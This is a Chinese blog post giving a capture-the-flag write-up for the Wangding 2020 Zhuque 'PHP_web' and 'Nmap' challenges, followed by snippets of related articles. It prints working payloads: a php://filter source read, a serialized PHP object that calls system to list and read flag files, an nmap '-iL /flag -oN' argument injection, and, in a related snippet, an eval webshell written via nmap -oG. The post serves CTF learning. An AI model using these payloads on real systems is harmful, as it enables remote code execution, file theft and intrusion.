nmap 关闭php,网鼎2020朱雀组 PHP_web+NMAP

最新推荐文章于 2024-04-26 09:06:25 发布
最新推荐文章于 2024-04-26 09:06:25 发布
阅读量131 收藏
点赞数
文章标签: nmap 关闭php

前言

没错,我就是懒狗。。。题目在CTFHUB上有复现

PHP_WEB 反序列化+函数构造+伪协议读取

打开页面,发现什么都有,抓包看一下

20200603174535255q5o59ll0shmr9za_0.png

发现有func和p参数,而且参数配合起来是个PHP内置函数,猜测可以构造PHP函数,先简单fuzz

20200603174535255q5o59ll0shmr9za_8.png

发现file_get_contents这个没有被过滤,可以利用这个函数配合伪协议读取文件

func=file_get_contents&p=php://filter/read=convert.base64-encode/resource=index.php

20200603174535255q5o59ll0shmr9za_5.png

解码

phpweb

background:url("bg.jpg") no-repeat;

background-size: 100%;

}

p {

color:white;

}

"escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",

"array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",

"array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;

}else{return "";

}

}classTest {var $p = "Y-m-d h:i:s a";var $func = "date";function__destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);

}

}

}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);

}else{die("Hacker...");

}

}?>

重点是PHP代码,Test类里有个__destruct()方法,那就构造反序列字符串。然后func那填unserialize进行反序列化触发__destruct()

20200603174535255q5o59ll0shmr9za_7.png

脚本

}$a=newTest;print(serialize($a));?>

//O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

传入

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

20200603174535255q5o59ll0shmr9za_1.png

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

20200603174535255q5o59ll0shmr9za_9.png

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"cat /flag_2654626055";s:4:"func";s:6:"system";}

20200603174535255q5o59ll0shmr9za_2.png

NMAP  namp命令使用

20200603174535255q5o59ll0shmr9za_3.png

20200603174535255q5o59ll0shmr9za_6.png

127.0.0.1’ -iL /flag -oN vege.txt’ 提交之后去访问/vege.txt

20200603174535255q5o59ll0shmr9za_4.png

-iL从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息

-oN 把扫描结果重定向到一个可读的文件logfilename中。

参考链接:

官方WP

https://blog.csdn.net/Pdsdt1/article/details/106199660/

横山老尸
关注
【学习笔记 48】 buu [网鼎2020 朱雀]Nmap
weixin_43553654的博客
08-11 763
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php
网鼎2020朱雀-web
ChenZIDu的博客
05-18 3059
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
PHP如何调用nmap扫描IP,Nmap脚本使用
weixin_34221374的博客
03-22 508
Nmap是主机扫描工具,他的图形化界面是Zenmap,分布式框架为Dnamp。Nmap可以完成以下任务:端口扫描工具,即借助工具,试图了解所扫描IP提供的计算机网络服务类型(网络服务均与端口号相关),从而发现攻击弱点,常见服务对应端口号:HTTP80HTTPS443Telnet23FTP21SSH(安全登录)、SCP(文件传输)、端口重定向22SMTP25POP3110WebLogic7001TO...
php 调用 nmap,渗透测试之Nmap命令(三) idle 扫描
weixin_42514654的博客
03-20 255
1. 空闲扫描前两篇文章已介绍了Nmap命令的1些基本选项和若干类型的扫描,下面继续来介绍Nmap的1个扫描类型――空闲扫描。为了下降被检测到的机率,我们通常需要转嫁责任,这时候可使用空闲扫描(idle scan),让1个僵尸主机承当扫描任务。nmap.org官网上详细讲述了空闲扫描的原理,可以在http://nmap.org/book/idlescan.html了解空闲扫描的所有信息。使用空闲扫...
PHP如何调用nmap扫描IP,目录扫描、Nmap
weixin_39692847的博客
03-22 518
一、基本定义1、目录扫描:扫描站点的目录,寻找敏感文件(目录名、探针文件、后台、robots.txt、备份文件等)。2、目录:站点结构,权限控制不严格。3、探针文件:服务器配置信息,例:phpinfo.php、readme.php、config.txt4、后台:管理整个网站的入口,inurl:admin.php5、rebots.txt:一般存放在站点根目录,如果管理员对robots.txt文件不合...
php(间接)调用nmap命令时的选项特殊点
weixin_30411997的博客
02-12 121
使用php调用pythn-nmap时,发现无法正常执行扫描动作 将nmap命令直接写入php,由后者调用,发现仍然无法执行,提示需要添加“-Pn”选项 原来是: 正常情况下:nmap -n host 可以正常执行。 但是如果是通过php调用或间接调用,必须使用 -Pn 选项 转载于:https://www.cnblogs.com/phoenix--/p/3545576.html...
Php版本不同版本比较
记录在编码的路上
04-08 1333
Php版本不同版本比较
[网鼎2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
python调用masscan+nmap实现精确扫描
06-30
接着,`run_nmap`函数调用`nmap`对每个开放端口进行详细扫描。最后,脚本读取`IP.txt`中的IP地址,逐个进行扫描。 注意,这样的扫描可能涉及法律和道德问题,确保你有权限扫描这些目标,并遵守当地法律法规。此外,...
WebMap:WebMap-Nmap Web 仪表板和报告
05-30
Nmap XML 报告的 Web 仪表板 目录 截屏 用法 您应该将它与 docker 一起使用,只需发送以下命令: $ mkdir /tmp/webmap $ docker run -d \ --name webmap \ -h webmap \ -p 8000:8000 \ -v /tmp/webmap:/opt/...
2020网鼎朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4198
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
CTFhub信息泄露漏洞实验指导手册
weixin_43401651的博客
09-30 611
环境:Windows2008、Kali Linux靶场:CTFhub-信息泄露工具:浏览器:火狐浏览器抓包改包工具:burpsuite信息泄露漏洞利用工具:dirsearch、GitHack、dvcs-ripper、Nmap
CTFHub Web 信息泄漏(一)
最新发布
2301_81105268的博客
04-26 1326
打开题目点击开始寻找flag发现在flag_in_here页面中有四个文件夹点击打开第一个文件夹发现里面还有四个文件夹再次点击打开第一个文件夹里面什么都没有尝试对所有文件夹依次都点击打开在2/4中发现flag.txt点击打开即可得到flag不太懂这题的难点,搜索了一下目录遍历的知识点。目录遍历攻击,旨在访问存储在Web根文件夹之外的文件和目录。
CTFHub Web真题(7星)
qq_43936524的博客
05-20 779
文章目录七星难度SQL注入-2(字符布尔盲注)namp(nmap命令注入)shrine(Jinja SSTI)Web1(sql注入过滤)easy_login(nodejs JWT攻击) 七星难度 SQL注入-2(字符布尔盲注) fuzz admin字段发现会有两种结果账号不存在,和账号和密码错误 测试payload分别为admin' and 1=1 and 'tt'='tt和admin' and 1=2 and 'tt'='tt 猜测为'字符截断的字符型布尔盲注。 sqlmap语句 python sqlma
CTFHUBWeb技能树——信息泄露writeup
生活·代码_这里是青_分享快乐
04-12 6876
CTFHUB writeup,web技能树之信息泄露,目录遍历、PHPINFO、备份文件下载、网站源码、bak文件、Vim缓存、.DS_Store、Git泄露、Log、Stash、Index;路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 7万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CTFHub-彩蛋(持续更新~)
u013622866的博客
03-13 3491
题目入口 这个flag拿的我是真的舒服,完全是无心插柳柳成荫啊,哈哈哈哈哈哈嗝~ 在我做CTFHub的第一道web题的时候,原本做完的我,突然想试试,关环境的瞬间能不能访问靶机呢? 然后我就迅速刷新了一下靶机首页,然后就出现了下面的界面...... 失落的随手在界面里划来划去,突然!出现了下面一幕!! !!!!!!真香!意外收获的flag!!!!!!迫不及待地F12! 赶紧提...
CTFHub技能树RCE命令注入
szgyunyun的博客
03-19 5224
1.命令注入 // 关键代码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { ...
渗透测试之信息收集nmap
黑面狐
11-30 6891
NMAP常用参数 -sT     TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。 -sP     ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。 -sS     半开扫描,一般不会记入日志,不过需要root权限。 -sU     udp扫描,但是一般不可靠, -
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值